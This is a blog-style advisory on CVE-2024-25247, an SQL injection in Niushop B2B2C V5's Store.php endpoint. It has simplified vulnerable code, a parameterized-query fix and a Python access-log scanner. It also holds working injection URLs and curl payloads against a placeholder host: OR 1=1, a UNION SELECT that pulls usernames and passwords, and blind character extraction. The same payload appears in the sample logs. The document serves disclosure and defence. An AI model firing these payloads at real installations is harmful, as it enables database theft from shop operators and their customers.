A serious vulnerability, tracked as CVE-2024-25247, has been discovered in the popular Niushop B2B2C V5 e-commerce system. The flaw allows attackers to execute arbitrary SQL commands via the 'latitude' and 'longitude' parameters handled in /app/api/controller/Store.php. If you run Niushop B2B2C, read this and check your installation: your data and your customers' data are at risk.
What is CVE-2024-25247?
CVE-2024-25247 is an SQL Injection vulnerability. It affects all installations of Niushop B2B2C V5 where user input in the API (/app/api/controller/Store.php) is not properly sanitized. This means an attacker can inject malicious SQL via API requests to steal, modify, or delete database records.
Original CVE record:
https://nvd.nist.gov/vuln/detail/CVE-2024-25247
Let's look at a simplified version of the vulnerable code inside Store.php:

```php
// In /app/api/controller/Store.php (simplified)
public function getStoreList() {
    // Raw query-string values, taken without any validation.
    $latitude  = $_GET['latitude'];
    $longitude = $_GET['longitude'];
    // Build the SQL query by interpolating user input directly!
    $sql = "SELECT * FROM stores WHERE latitude = '$latitude' AND longitude = '$longitude'";
    $result = $this->db->query($sql);
    // ...
}
```
What's wrong?
- User-supplied $latitude and $longitude are put directly into the SQL query with no filtering.
- This allows an attacker to send crafted text that breaks out of the intended query and runs any SQL they want.
Exploitation Details: Example Attack
Assume Niushop is running at https://victim.site.
Suppose an attacker crafts a URL like this:
https://victim.site/app/api/controller/Store.php?latitude='%20OR%201=1%23&longitude=
This makes the SQL look like this:
SELECT * FROM stores WHERE latitude = '' OR 1=1#' AND longitude = ''
By changing the query to use a UNION, an attacker could grab data from another table:
curl "https://victim.site/app/api/controller/Store.php?latitude='%20UNION%20SELECT%20id,username,password,4,5%20FROM%20users%20--%20&longitude="
Attackers could also perform *blind* SQL injection when no errors are shown:
curl "https://victim.site/app/api/controller/Store.php?latitude='%20AND%20(SELECT%20ASCII(SUBSTR(password,1,1))%20FROM%20users%20LIMIT%201)=49%20--%20&longitude="
This manually checks if the first character in the password is '1' (ASCII 49).
*Reminder: Blind SQL injection is slow but can extract full DB contents.*
Online References
- CVE-2024-25247 on NVD
- Niushop GitHub
- SQL Injection Basics - OWASP
- (Check for vendor updates and patches; we recommend following CNVD and the official Niushop site)
How to Fix It
If you use Niushop B2B2C V5, patch your software immediately.
If no official patch is available yet, you can secure your code with these steps:
1. Validate Input: Only accept numeric values for latitude/longitude.
Example Fix:

```php
// Reject anything that is not a plain number instead of silently coercing it to 0.
if (!is_numeric($_GET['latitude'] ?? '') || !is_numeric($_GET['longitude'] ?? '')) {
    http_response_code(400);
    return;
}
$latitude  = floatval($_GET['latitude']);
$longitude = floatval($_GET['longitude']);
// Prepared statement: the values are bound as doubles, never spliced into the SQL text.
$stmt = $this->db->prepare("SELECT * FROM stores WHERE latitude = ? AND longitude = ?");
$stmt->bind_param('dd', $latitude, $longitude);
$stmt->execute();
$result = $stmt->get_result();
```
This effectively stops attackers from injecting SQL code.
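The same "numeric only" rule from step 1 can be applied retrospectively to your web-server access logs to learn whether the Store.php endpoint has already been probed. The following is an added example (not Niushop code); it assumes logs in the common combined format and the endpoint path named on this page, and the log lines embedded below are constructed.

```python
"""Flag requests to Store.php whose latitude/longitude is not a valid coordinate."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Feb/2024:23:20:01 +0000] "GET /app/api/controller/Store.php?latitude=31.2304&longitude=121.4737 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Feb/2024:23:21:14 +0000] "GET /app/api/controller/Store.php?latitude='%20OR%201=1%23&longitude= HTTP/1.1" 200 9120 "-" "curl/8.4.0"
203.0.113.9 - - [26/Feb/2024:23:21:30 +0000] "GET /app/api/controller/Store.php?latitude=-33.8688&longitude=151.2093 HTTP/1.1" 200 812 "-" "curl/8.4.0"
198.51.100.7 - - [26/Feb/2024:23:22:02 +0000] "GET /index.php?latitude='%20OR%201=1%23 HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
TARGET_PATH = "/app/api/controller/Store.php"   # endpoint from the advisory
COORD_RE = re.compile(r"^-?\d+(\.\d+)?$")       # plain signed decimal only
BOUNDS = {"latitude": 90.0, "longitude": 180.0}  # geographic ranges


def coordinate_is_valid(name: str, value: str) -> bool:
    """True when value is a plain decimal inside the range for that coordinate."""
    if not COORD_RE.match(value):
        return False
    return abs(float(value)) <= BOUNDS[name]


def find_suspicious_requests(log_text: str) -> list:
    """Return (ip, timestamp, param, decoded_value) for every Store.php request
    whose latitude or longitude fails validation. Blank values are flagged too:
    the endpoint has no legitimate reason to receive an empty coordinate."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != TARGET_PATH:
            continue          # other paths are out of scope for this check
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        for name in BOUNDS:
            for value in params.get(name, []):
                if not coordinate_is_valid(name, value):
                    hits.append((m.group("ip"), m.group("ts"), name, value))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

A hit is evidence of probing, not of compromise; correlate the source address and timestamp with database and application logs before concluding anything.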
Conclusion and Recommendations
CVE-2024-25247 is a critical vulnerability with real-world consequences. If you're running Niushop B2B2C V5, act now:
- Always use parameterized queries.
- If you want to check your own instance for SQL injection, use tools like sqlmap (with permission) and keep an eye on vendor security advisories.
Stay safe!
*If you have questions, drop them below or reach out to Niushop for support.*
Timeline
Published on: 02/26/2024 23:15:07 UTC
Last modified on: 08/29/2024 20:36:18 UTC